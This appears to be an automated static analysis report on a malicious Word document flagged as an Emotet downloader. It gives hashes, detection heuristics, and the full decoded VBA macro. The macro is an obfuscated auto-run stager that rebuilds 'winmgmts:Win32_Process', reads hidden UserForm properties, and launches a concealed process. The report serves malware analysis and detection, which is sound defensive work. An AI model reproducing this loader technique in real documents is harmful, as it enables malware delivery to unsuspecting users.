Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e248c93cd7014fc…

MALICIOUS

Office (OLE)

Size: 180.7 KB
Created: 2019-12-13 11:46:00
Authoring application: Microsoft Office Word
First seen: 2021-02-23
MD5: 4677cd6a7f06bdc1c246c2ba73394721
SHA-1: 77d3cc24e171473eb1a32e12107b88c2aa0c4fb9
SHA-256: 7e248c93cd7014fc9f4ce9cd49b64bf3bf1432fde8e279029da76d788ddba82b
Risk Score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7451718-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7451718-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] (OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script:
    Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess"
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
    Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
    Private Sub Document_open()
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (label: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9594 bytes
SHA-256: 6b1a61b17f2458a95e99ebfa01594acc21a98a51aeef5b057d91e6f0be23d0c1
Detection: ClamAV: No threats found
Obfuscation or payload: likely (162 of 252 identifiers look randomly generated, e.g. 'winOMDNmgmOMDNts', which is consistent with name-mangling obfuscation)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sjzwtzgavjuc"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Vsvjzgyjrzdav, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select _
 Case Gkhfokxr
      Case 632
         Bsbcklhm _
         = Cos _
         (331)
         Esbshmrwvmvh = Atn(130)
         Iicezihbzehr _
         = Cos(51)
      Case 689
         Ydbmikynj = Atn(917)
         Ctavwhuzgubic _
         = 669
         Ldtwlqwlxrk = CDate _
         (977)
      Case 924
         Hwuznhwpgfdwn = _
         CInt(457)
         Lwvyytyuum = Log(Ghdelyvsk)
         Uvqyfyqa = Naawljeibankz
End Select
   Select _
 Case Dgtgibcb
      Case 311
         Ueyeprfg _
         = Cos _
         (998)
         Ehavswjiqj = Atn(944)
         Qqwaqsbbq _
         = Cos(248)
      Case 67
         Qsdvaoxaz = Atn(995)
         Wvfxnmrtk _
         = 903
         Onhipameutjck = CDate _
         (763)
      Case 743
         Aiutjczmtau = _
         CInt(729)
         Ojwkhqdqo = Log(Wnullmsuuymjz)
         Xpbnhuhhqlx = Uzymqwxvhnbh
End Select
   Select _
 Case Neefbyyurskb
      Case 692
         Zyloasqlsko _
         = Cos _
         (819)
         Xbgxmajcjjd = Atn(279)
         Luxvzkrz _
         = Cos(920)
      Case 522
         Bzvndbmuqdh = Atn(338)
         Lvxaclqohuzg _
         = 209
         Xkegrinexrn = CDate _
         (37)
      Case 759
         Xpmqtkbl = _
         CInt(127)
         Jooyzufw = Log(Nojlxqsfg)
         Nwktzudfw = Xhurdjnk
End Select
Splhxibnp
End Sub


Attribute VB_Name = "Fodxhwzmz"
Attribute VB_Base = "0{18D9CF1A-F049-41BC-B873-4DBFCF6E4700}{00BE8A41-D2CD-45B3-9031-16D908976C67}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Bmuopqew"
Function Xgtumzclb()
   Select _
 Case Iotsqkvlv
      Case 727
         Yyifsiggxqr _
         = Cos _
         (295)
         Wmrhcdyyhgh = Atn(184)
         Dqvwcjwzxsj _
         = Cos(644)
      Case 168
         Wzesprudwesn = Atn(19)
         Vorrazffplan _
         = 944
         Qythgihyuorql = CDate _
         (484)
      Case 711
         Lcjtsbkgb = _
         CInt(690)
         Oqjsrbjx = Log(Kkgakwtcakowy)
         Rupwfssyf = Pcxpgnvibsc
End Select
Ykboaqazck = Sjzwtzgavjuc.Vsvjzgyjrzdav
   Select _
 Case Qocfhjwgylcz
      Case 135
         Ljutfszzsmcy _
         = Cos _
         (363)
         Jjzqspcexga = Atn(896)
         Rbwbsjrbkpska _
         = Cos(54)
      Case 649
         Vqdidhwomlg = Atn(817)
         Hlotiuixvljo _
         = 751
         Ztgfruligcr = CDate _
         (634)
      Case 952
         Unjpmvyuybz = _
         CInt(492)
         Mtafuuptx = Log(Fothzelbp)
         Klvxtqtasge = Shbixdyxt
End Select
Xbanklpccm = Ykboaqazck + Fodxhwzmz.Mfzwggep + Fodxhwzmz.Rxisphkvcbj + Fodxhwzmz.Ffirrcbek
   Select _
 Case Efbwurnmq
      Case 475
         Qovpndyk _
         = Cos _
         (95)
         Xzowgexntq = Atn(555)
         Asqhdgymguia _
         = Cos(41)
      Case 128
         Qbteiejuhf = Atn(562)
         Nmqyxvhyndygz _
         = 15
         Ddcrnixovu = CDate _
         (982)
      Case 2
         Oifkkudsm = _
         CInt(523)
         Xntpvndnf = Log(Greozrqxvein)
         Isnmwzahvfe = Bbsgjrvcofwu
End Select
Vcsphyutxg = Xbanklpccm + Fodxhwzmz.Gdfedqumrahz + Fodxhwzmz.Adcynifadjy.ControlTipText
   Select _
 Case Uzdwafwkq
      Case 999
         Iiodxnqjh _
         = Cos _
         (939)
         Auidlmkpgipz = Atn(979)
         Xvypxykizsn _
         = Cos(811)
      Case 938
         Kzlpmcayjnx = Atn(340)
         Aarxtjinas _
         = 696
         Jfjsuqqrwaqv = CDate _
         (283)
      Case 180
         Xeqohavn = _
         CInt(894)
         Rczelcjhtv = Log(Rgoxgcnzkweqm)
         Mlqywgzarrmgu = Bxaznjzjut
End Select
Xgtumzclb = Nmomhxzxr + Vcsphyutxg + Nmomhxzxr
   Select _
 Case Bfcpoizjssgl
      Case 620
         Dyfazdzk _
         = Cos _
         (327)
         Xcugzwjktp = Atn(133)
         Bilpegvdakcr _
         = Cos(614)
      Case 658
         Swhltqbssm = Atn(556)
         Kvjvrlniwwok _
         = 904
         Paimzdzmemci = CDate _
         (77)
      Case 399
         Tjqyblvzuesre = _
         CInt(778)
         Whxlzaakfnk = Log(Rwsjpopngqiox)
         Duhycvhff = Yszklrtxhxlic
End Select
End Function
Function Splhxibnp()
   Select _
 Case Cuwsmnfzdcflf
      Case 949
         Hlynuxlk _
         = Cos _
         (444)
         Qiujguphuabsg = Atn(205)
         Pwwjmtfari _
         = Cos(231)
      Case 365
         Uizrjluwfk = Atn(385)
         Hqdkbapfkbebo _
         = 387
         Ekhcbwluzvjsg = CDate _
         (299)
      Case 894
         Gegzbvpuyrte = _
         CInt(135)
         Dydinqlxioav = Log(Pshjurvz)
         Zdopjlismbw = Ksvgiwsyg
End Select
Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess"
   Select _
 Case Pexhtsssmc
      Case 18
         Kefqrmnnzqmfw _
         = Cos _
         (244)
         Lasfyobfccwxx = Atn(563)
         Jekchzkh _
         = Cos(242)
      Case 336
         Lkjzsrlbwgs = Atn(641)
         Vjjycovpqfxgh _
         = 589
         Lwbsoqnergkk = CDate _
         (986)
      Case 200
         Bbjqhptybitjy = _
         CInt(228)
         Mslxsqzez = Log(Iessrejtp)
         Qafzmvtzesr = Nznsfbwkl
End Select
Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff)
   Select _
 Case Tjkmdcsffbsq
      Case 385
         Fliucrgbtb _
         = Cos _
         (915)
         Igjiffyglvwha = Atn(568)
         Elwbddawbaiif _
         = Cos(642)
      Case 362
         Pjiftlwwwnse = Atn(738)
         Paujrbpxza _
         = 68
         Khiwwsrsfn = CDate _
         (817)
      Case 931
         Anioaolzbmmz = _
         CInt(738)
         Nmcsjilkboozq = Log(Fdcbzietbx)
         Vhxviixeepn = Jpltzaylmwi
End Select
Vtvqkylc = Zmfpzzehhgbff + Fodxhwzmz.Rwtxaphjyf.ControlTipText + Fodxhwzmz.Hmevofwpu.ControlTipText
   Select _
 Case Lsriftrydqgts
      Case 657
         Ecorhxdd _
         = Cos _
         (178)
         Nfzgimrh = Atn(937)
         Puvxdizr _
         = Cos(283)
      Case 681
         Yvhrdkfbkaiow = Atn(6)
         Orsueomiknkg _
         = 640
         Yymlwfsxidx = CDate _
         (451)
      Case 791
         Wjtaxqfprgw = _
         CInt(542)
         Lmweteonmb = Log(Azaqjpwx)
         Yrmnplyhrpx = Fbektscjixxw
End Select
Wxszvkzmqhdba = Vtvqkylc + Sjzwtzgavjuc.Vsvjzgyjrzdav
   Select _
 Case Ltnkoouyan
      Case 76
         Uefrjmyxfmff _
         = Cos _
         (815)
         Cxxfxzdcv = Atn(944)
         Imktlaefd _
         = Cos(504)
      Case 496
         Szpauxfzoi = Atn(297)
         Lwavqzqsj _
         = 309
         Azndulazcu = CDate _
         (533)
      Case 11
         Yqwfgxvww = _
         CInt(693)
         Yxkfogmvz = Log(Obgtknoidm)
         Ceuukunyqxu = Jfmspyuhl
End Select
Set Splhxibnp = CreateObject(Wxszvkzmqhdba)
   Select _
 Case Bbrjowvgkek
      Case 873
         Eifxoigdzwqmy _
         = Cos _
         (456)
         Wwomouurhk = Atn(903)
         Wzyojejhq _
         = Cos(33)
      Case 161
         Urjlcebxqi = Atn(323)
         Nqxkfkryml _
         = 64
         Ebhghpgwzl = CDate _
         (423)
      Case 595
         Firmfmmznpkym = _
         CInt(268)
         Xyyyjqzh = Log(Uqbbmkcwbewsf)
         Zbwoqitn = Xamkfgaqok
End Select
Splhxibnp.XSize = False * False
   Select _
 Case Qyirzjrpsthta
      Case 464
         Rdguabtrqkoae _
         = Cos _
         (331)
         Jwwfmymf = Atn(879)
         Rnpywspjrliza _
         = Cos(995)
      Case 260
         Xgsgljmapkkwu = Atn(569)
         Exvwjnettrzrn _
         = 288
         Kvjkoruyzpem = CDate _
         (637)
      Case 743
         Lwutrhldeeh = _
         CInt(285)
         Yplszxuzpnk = Log(Kyvhebefh)
         Xvwjgrecw = Jowepfowikskw
End Select
Splhxibnp.YSize = False * False
   Select _
 Case Ajtlglezw
      Case 381
         Qcaxbdzwjts _
         = Cos _
         (216)
         Zqloyuzlfyiph = Atn(934)
         Nbxqqazbqcve _
         = Cos(103)
      Case 682
         Hohqwlpzq = Atn(914)
         Wekdriug _
         = 104
         Iwccwapvld = CDate _
         (133)
      Case 268
         Hyjayllenkvo = _
         CInt(418)
         Pxyubxzvysfn = Log(Adexlcxmtr)
         Vbvyaniaks = Csulzrvllze
End Select
Do While Jntjvyppzzc.Create(Null & Xgtumzclb, Aeefqcdyjukof, Splhxibnp)
Loop
   Select _
 Case Grsnftpk
      Case 269
         Qjysrgcnkrgzl _
         = Cos _
         (950)
         Uvkiyghrdhdzf = Atn(731)
         Wsncytsytry _
         = Cos(396)
      Case 77
         Hvggsokxfby = Atn(628)
         Sulngxcwv _
         = 492
         Ibfbxqramr = CDate _
         (809)
      Case 538
         Axhrzqrrp = _
         CInt(561)
         Bxnflbruliu = Log(Jjaojxerinl)
         Gdfewxwleeklg = Wxzfarhqqdhr
End Select
End Function